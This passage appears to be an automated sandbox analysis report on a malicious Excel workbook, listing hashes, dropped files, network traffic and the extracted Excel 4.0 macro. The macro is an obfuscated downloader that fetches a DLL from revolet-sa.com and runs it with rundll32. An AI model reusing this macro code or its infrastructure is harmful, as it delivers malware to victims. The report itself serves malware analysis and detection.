                • 162.241.54.59
                06iKnPFk8Y.dllGet hashmaliciousBrowse
                • 162.241.54.59
                ddff.exeGet hashmaliciousBrowse
                • 108.179.235.108
                PowerShell_Input.ps1Get hashmaliciousBrowse
                • 162.241.61.203
                New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                • 192.185.122.118
                Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
                • 162.241.148.243
                document-1848152474.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                • 162.241.54.59
                pySsaGoiCT.dllGet hashmaliciousBrowse
                • 162.241.54.59
                QOpv1PykFc.dllGet hashmaliciousBrowse
                • 162.241.54.59
                S4caD0RhXL.dllGet hashmaliciousBrowse
                • 162.241.54.59
                pH8YW11W1x.dllGet hashmaliciousBrowse
                • 162.241.54.59

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbxSecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                    C:\Users\user\sdbybsd.fdsSecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                      SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbx
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:downloaded
                        Size (bytes):688241
                        Entropy (8bit):7.064532901692121
                        Encrypted:false
                        SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                        MD5:7DF0611CD75FA4C02B29070728C37247
                        SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                        SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                        SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                        Malicious:true
                        Antivirus:
                        • Antivirus: Virustotal, Detection: 22%, Browse
                        • Antivirus: ReversingLabs, Detection: 2%
                        Joe Sandbox View:
                        • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                        • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                        Reputation:low
                        IE Cache URL:http://revolet-sa.com/files/countryyelow.php
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\0BCE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):67964
                        Entropy (8bit):7.87953531390611
                        Encrypted:false
                        SSDEEP:1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70Zk:LqeRrW2JyW32AiHD2sTU2yF70y
                        MD5:18D5800BB59D4CDB25D50DF1316B2465
                        SHA1:370473B1DF913CE700D9281625282065CC1811EF
                        SHA-256:C73CE424938392370B843621F6260DD20119098D198D0A7608F796EAF246B121
                        SHA-512:4984A164DD52680E68B31710C58210222276FA51FA0CB06C50AA17B96AA1849333E856B2BF758BB9927CC13C5DD78CC88ABB4D72B234F3C2F9A7836BDC0B0886
                        Malicious:false
                        Reputation:low
                        Preview: .U[O.0.~........&M......i.....o....~..2......\l....xy.)Y<....U.R.f.........;)|..A..5.'.../...E_D..5iC.?(..E..2.u.i.S..[S.l.k...7...C...Y-...G......X.&..n]...P....(.U3...43.q(......A...O..e)..UD.5.....PH3os...q?..8.....nA......1..0Ir.|..CY..1T..3...$.9........4...|..i........V.:....R..<.#..kd...=W.....e..}U.Q...~./qC........L3..>l%.#..).tJ....Wp.M~.....>...d....{O4..@..6......{H?..;g......^:xB.6......>.!......uFL..G>.M.........PK..........!..r.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                        Process:C:\Windows\SysWOW64\rundll32.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2178
                        Entropy (8bit):7.031603060981824
                        Encrypted:false
                        SSDEEP:48:Kb6U3Xt56fOgWh3c5U3Xl5MSib6U3XH6LHf+6snQvOFZ3XvQKFPF:Kb6AZmq5MFb6We2pMKFPF
                        MD5:4F8F4D65E7D67B271524E3DDDF2E812D
                        SHA1:AD59D32FF2EFB8083B6138E94184037D18902875
                        SHA-256:3310FAB31AF8268161DD1C84DCFB897A747AF01B3B351DB3FE6F13FBD0DEDBA3
                        SHA-512:96D98809AA404831495BB278F7F6FD64163BC4DD4C28CD906C9B3583080A7AD909D7AC3ECE9F577C339792945758EE4307032701D61EF5B847B859A5DBA0A56C
                        Malicious:false
                        Reputation:low
                        Preview: ........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O......J....u.O...V.5D.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....E`.....uA./.......U>...................... ....A^Y........u..*`&!q...}./.k._o*......5a.}.P.L#2\E8......b`LDn\......TL.A*^..;.%....y...J..m.+,...&.7.`..Y..(..I...I....s4.U-..%..T.S~X....x..8........@o.C).44.....z|..Y.?k..q.......j.N.....Lo..w0.@.....J..'>-.......#@Q.[.+^'..].9X..6.....g7.Fg..si<..v.{....(-x..:V./_<.1...iYDW...{O...K.A8s...J....v.....&..GQI.k....Fq.$ly..gHJ9..qK.3..d....ve...xR..X1..~...E.H..m..-.iyr......eXx...ErQ.$N..lH...x...H.0..._N.V?...@.....n...\..3..B{.y=PR..X3J!...n,<sa.3f}z#.q.k?n.s.R.lE....................z..O......J....u.O...V.5D.........E.x.p.o.r.t. .F.l.a.g....f...... .....d-..;....=o.....VYS.....h.G9............. .....U.0...
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 06:39:37 2021, atime=Wed Apr 7 06:39:37 2021, length=8192, window=hide
                        Category:dropped
                        Size (bytes):867
                        Entropy (8bit):4.4753143676981315
                        Encrypted:false
                        SSDEEP:12:85QxiHcLgXg/XAlCPCHaXgzB8IB/GUMX+WnicvbK+bDtZ3YilMMEpxRljK/bTdJU:85JK/XTwz6IoYezDv3qY/rNru/
                        MD5:8D3B7D68629D3D2CF685B79FF61C8368
                        SHA1:5C1F0FDC2071992D3D0A0EE1D22F60002B98CFC1
                        SHA-256:66C71CA5FBC4919861E4B3059A566C04360B11F27136D4D7C79F1D7838E1CBF4
                        SHA-512:D03C48E111D8470A14CFF5CFA66A0F3DBD8FBBFFEFF90623BC6232A26AAB98F1AC235BE81129728E9D79053BB64953EE3D9C1BCBEFF64B25E939C658C8329BAA
                        Malicious:false
                        Reputation:low
                        Preview: L..................F...........7G....I).+....I).+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.<..Desktop.d......QK.X.R.<*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\301389\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......301389..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.19090.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 7 06:39:24 2021, mtime=Wed Apr 7 06:39:37 2021, atime=Wed Apr 7 06:39:37 2021, length=92160, window=hide
                        Category:dropped
                        Size (bytes):2198
                        Entropy (8bit):4.556211471537111
                        Encrypted:false
                        SSDEEP:48:8o/XT3IxHhHPCHhHKY/Qh2o/XT3IxHhHPCHhHKY/Q/:8o/XLIxhEKY/Qh2o/XLIxhEKY/Q/
                        MD5:56591CE780AB2B22145D6C602187FEBC
                        SHA1:A98E9126AE45B21DA40965DBE505A56E21F794F2
                        SHA-256:3F1E7DADA6CF93803F73BA57EE80976A36C7138882DECAE9F8744B98D16A5EC4
                        SHA-512:F5587DDC5C3C3A42455C121695428581938F360BB0202AB18D7F954510AB3ED6A110916E141D19840EC71F0DC509E75AB4412B0E5ED34604454C5B36C6B9B888
                        Malicious:false
                        Reputation:low
                        Preview: L..................F.... ......!.+....I).+..(.P).+...h...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.<..Desktop.d......QK.X.R.<*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.< .SECURI~1.XLS..l......R.<.R.<*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.9.0.9.0...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\301389\Users.user\Desktop\SecuriteInfo.com.Heur.19090.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.9.0.9.0...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):134
                        Entropy (8bit):4.692593666327791
                        Encrypted:false
                        SSDEEP:3:oyBVomM0bIV9CuscbIV9CmM0bIV9Cv:dj60Kl0x
                        MD5:B6FDE063100C2E59B4C1F26331BBF794
                        SHA1:ACA2DCBB6D739ECCC16A2EFE91727091CDEA3EDD
                        SHA-256:7E16E199BFD6286940A2F4C04A0C577A8BC09F47808C6A48713BED4EA2D3BE10
                        SHA-512:98279B1E55D5DFC45412F292E05AF27502D664A531C95BE47B01623E7B6EDC958FD540D639CD5D05398E58D28AFF8401A3069E101965EF9CD7180A4752CB1E18
                        Malicious:false
                        Reputation:low
                        Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.19090.LNK=0..SecuriteInfo.com.Heur.19090.LNK=0..[xls]..SecuriteInfo.com.Heur.19090.LNK=0..
                        C:\Users\user\Desktop\BBCE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Applesoft BASIC program data, first line number 16
                        Category:dropped
                        Size (bytes):127008
                        Entropy (8bit):7.230450160548897
                        Encrypted:false
                        SSDEEP:3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSZ2jTUqyF70XirW2aUvlhaUvlUI8rmjl:G8rmjAItyzElBIL6lECbgBvP5NmuCSei
                        MD5:F55089B3CE118226D0C691787FDFBFF7
                        SHA1:46D6091DD5C0EFB2A98C0C7998FBFF06BF8DFA8D
                        SHA-256:42917635F3AD79A5896F70AE5C4DE8C796EB820E44C7AB283EAD581FEF9373CB
                        SHA-512:78B96817D6EFCBD1BC91E70F2F6697A8C6FC9C468B4852B6A8CC5E69870E18902F04A07837C560C53A7F99556502937B9B6F71B65916D91021603A3E114C4B4F
                        Malicious:false
                        Reputation:low
                        Preview: ........g2..........................\.p....user B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.........
                        C:\Users\user\sdbybsd.fds
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):688241
                        Entropy (8bit):7.064532901692121
                        Encrypted:false
                        SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                        MD5:7DF0611CD75FA4C02B29070728C37247
                        SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                        SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                        SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                        Malicious:true
                        Antivirus:
                        • Antivirus: Virustotal, Detection: 22%, Browse
                        • Antivirus: ReversingLabs, Detection: 2%
                        Joe Sandbox View:
                        • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                        • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                        Reputation:low
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Apr 6 15:04:37 2021, Security: 0
                        Entropy (8bit):3.087349849990019
                        TrID:
                        • Microsoft Excel sheet (30009/1) 78.94%
                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                        File name:SecuriteInfo.com.Heur.19090.xls
                        File size:267776
                        MD5:daf2b1b562a007a93fbe00dee3ec93d3
                        SHA1:eed18fda9a83a4d6bdc1d65ea29c6dc62dddaf5f
                        SHA256:ac5eb1618543365bfdbd27633949fc179424317db799d2ca55e39f0ef88fff44
                        SHA512:65dddd98085bb38798b93ba896cf4a821d509c073bdd9133c13b6a10210026e1237c6bf799521476304b2cf0f7249c97535863a0d5f56408c935a4922807b959
                        SSDEEP:6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0u:Fhu
                        File Content Preview:........................>......................................................................................................................................................................................................................................

                        File Icon

                        Icon Hash:e4eea286a4b4bcb4

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "SecuriteInfo.com.Heur.19090.xls"

                        Indicators

                        Has Summary Info:True
                        Application Name:Microsoft Excel
                        Encrypted Document:False
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:True
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:
                        Flash Objects Count:
                        Contains VBA Macros:True

                        Summary

                        Code Page:1251
                        Last Saved By:5
                        Create Time:2006-09-16 00:00:00
                        Last Saved Time:2021-04-06 14:04:37
                        Creating Application:Microsoft Excel
                        Security:0

                        Document Summary

                        Document Code Page:1251
                        Thumbnail Scaling Desired:False
                        Contains Dirty Links:False

                        Streams

                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        File Type:data
                        Stream Size:4096
                        Entropy:0.342986545458
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00
                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                        General
                        Stream Path:\x5SummaryInformation
                        File Type:data
                        Stream Size:4096
                        Entropy:0.247521269318
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                        Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780
                        General
                        Stream Path:Book
                        File Type:Applesoft BASIC program data, first line number 8
                        Stream Size:255780
                        Entropy:3.03349063455
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                        Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                        Macro 4.0 Code

                        ,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
                        ,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
                        =HALT()

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 7, 2021 00:40:04.612869024 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:04.799949884 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:04.800050020 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:04.807867050 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:04.996253967 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259238005 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259294033 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259332895 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259372950 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259413004 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259449959 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.259459972 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259485960 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.259494066 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.259501934 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259541988 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259541988 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.259576082 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.259582996 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259613991 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.259625912 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.259670973 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.259691954 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.269365072 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.444904089 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.444964886 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445004940 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445044994 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445082903 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445122004 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445163012 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445130110 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.445211887 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445257902 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:05.445272923 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.445287943 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:05.445295095 CEST4916580192.168.2.22192.232.249.186
